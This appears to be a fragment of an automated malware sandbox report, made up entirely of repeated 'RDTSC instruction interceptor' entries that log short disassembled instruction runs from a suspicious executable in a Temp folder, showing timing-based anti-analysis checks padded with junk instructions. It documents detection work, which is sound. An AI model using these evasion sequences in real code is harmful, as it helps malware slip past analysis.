Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6FF4C0 second address: 6FF4C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 6FF96D second address: 6FF98A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF698E1E1A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF698E1E1B3h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 700055 second address: 70006F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF698BF10D4h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 7032EC second address: 7032F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 705E9C second address: 705EA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 706229 second address: 70622D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 707C8E second address: 707C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 707C94 second address: 707C98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 7077DC second address: 707815 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007FF698BF10C6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF698BF10D9h 0x00000017 jmp 00007FF698BF10CEh 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 709796 second address: 7097AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF698E1E1B2h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 7097AD second address: 7097BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF698BF10CBh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 7097BF second address: 7097CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C80E79 second address: 4C80EC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF698BF10CFh 0x00000008 pop esi 0x00000009 jmp 00007FF698BF10D9h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF698BF10D3h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C80EC0 second address: 4C80EDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C80EDD second address: 4C80EE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C80EE3 second address: 4C80EE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C80EE7 second address: 4C80F22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d jmp 00007FF698BF10D4h 0x00000012 mov eax, 277E87F1h 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C80019 second address: 4C8006F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF698E1E1B7h 0x00000008 movzx eax, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f jmp 00007FF698E1E1B0h 0x00000014 mov dword ptr [esp], ebp 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushfd 0x0000001b jmp 00007FF698E1E1ACh 0x00000020 sbb esi, 6B4AF548h 0x00000026 jmp 00007FF698E1E1ABh 0x0000002b popfd 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C8006F second address: 4C80091 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 call 00007FF698BF10D0h 0x0000000d pop esi 0x0000000e pop edi 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C80091 second address: 4C8009B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 4FA16BECh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C8009B second address: 4C800BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 movsx ebx, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d pushad 0x0000000e jmp 00007FF698BF10D2h 0x00000013 push eax 0x00000014 push edx 0x00000015 mov ch, 98h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CB068B second address: 4CB06CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF698E1E1B6h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF698E1E1B7h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CB06CC second address: 4CB06D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CB06D2 second address: 4CB06E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov cx, 703Fh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C5018F second address: 4C501A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF698BF10D4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C501C5 second address: 4C5021B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushfd 0x00000008 jmp 00007FF698E1E1B9h 0x0000000d adc al, FFFFFFE6h 0x00000010 jmp 00007FF698E1E1B1h 0x00000015 popfd 0x00000016 pop eax 0x00000017 popad 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF698E1E1B9h 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C5021B second address: 4C50230 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50230 second address: 4C50240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF698E1E1ACh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50240 second address: 4C50244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C70D33 second address: 4C70D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C70D37 second address: 4C70D54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C70D54 second address: 4C70D71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C70D71 second address: 4C70D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C70D75 second address: 4C70D79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C70D79 second address: 4C70D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C70D7F second address: 4C70D85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C70D85 second address: 4C70D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C7088F second address: 4C70895 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C70895 second address: 4C708B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF698BF10D9h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C708B9 second address: 4C708C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF698E1E1ACh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C708C9 second address: 4C708CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C708CD second address: 4C70909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF698E1E1AFh 0x00000012 add cx, DE5Eh 0x00000017 jmp 00007FF698E1E1B9h 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C70909 second address: 4C7090F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C7090F second address: 4C70913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C70913 second address: 4C70917 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C70917 second address: 4C70944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FF698E1E1AFh 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov esi, 2095792Bh 0x00000016 mov ecx, 78707D07h 0x0000001b popad 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C70944 second address: 4C7094A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C7094A second address: 4C70950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C707D7 second address: 4C707F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C707F2 second address: 4C707F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C707F6 second address: 4C707FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C70594 second address: 4C7059A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CB05A9 second address: 4CB05AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CB05AD second address: 4CB05D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF698E1E1B7h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CB05D0 second address: 4CB05D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CB05D4 second address: 4CB05DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CB05DA second address: 4CB05E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C902E9 second address: 4C902EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C902EF second address: 4C902F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C902F3 second address: 4C90330 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FF698E1E1B9h 0x0000000f mov eax, dword ptr [ebp+08h] 0x00000012 jmp 00007FF698E1E1AEh 0x00000017 and dword ptr [eax], 00000000h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C90330 second address: 4C90334 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C90334 second address: 4C9033A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C9033A second address: 4C90367 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax+04h], 00000000h 0x0000000d pushad 0x0000000e call 00007FF698BF10CEh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C90367 second address: 4C9037B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 popad 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov eax, 6F2D5461h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C70693 second address: 4C70697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C70697 second address: 4C7069D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C7069D second address: 4C70718 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 3D4E9D0Fh 0x00000008 push eax 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FF698BF10D1h 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FF698BF10D3h 0x0000001d and eax, 37AEA87Eh 0x00000023 jmp 00007FF698BF10D9h 0x00000028 popfd 0x00000029 pushfd 0x0000002a jmp 00007FF698BF10D0h 0x0000002f adc ecx, 1D45BB78h 0x00000035 jmp 00007FF698BF10CBh 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C70718 second address: 4C7073D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C7073D second address: 4C70741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C70741 second address: 4C70745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C70745 second address: 4C7074B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C80D72 second address: 4C80DFD instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF698E1E1AEh 0x00000008 xor si, C8A8h 0x0000000d jmp 00007FF698E1E1ABh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FF698E1E1AFh 0x0000001e jmp 00007FF698E1E1B3h 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FF698E1E1AEh 0x0000002f sbb ecx, 6A5C5D68h 0x00000035 jmp 00007FF698E1E1ABh 0x0000003a popfd 0x0000003b call 00007FF698E1E1B8h 0x00000040 pop ecx 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C90104 second address: 4C90108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C90108 second address: 4C9010E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C9010E second address: 4C90114 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C90114 second address: 4C9012F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C9012F second address: 4C90135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C90135 second address: 4C9013A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C9013A second address: 4C90152 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ecx, ebx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C90152 second address: 4C9017B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF698E1E1ADh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CA0CE0 second address: 4CA0CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CA0CE4 second address: 4CA0CE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CA0CE8 second address: 4CA0CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CA0CEE second address: 4CA0CF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CA0CF4 second address: 4CA0CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CA0CF8 second address: 4CA0D37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov al, D6h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushfd 0x0000000f jmp 00007FF698E1E1B9h 0x00000014 and cx, 8926h 0x00000019 jmp 00007FF698E1E1B1h 0x0000001e popfd 0x0000001f rdtsc
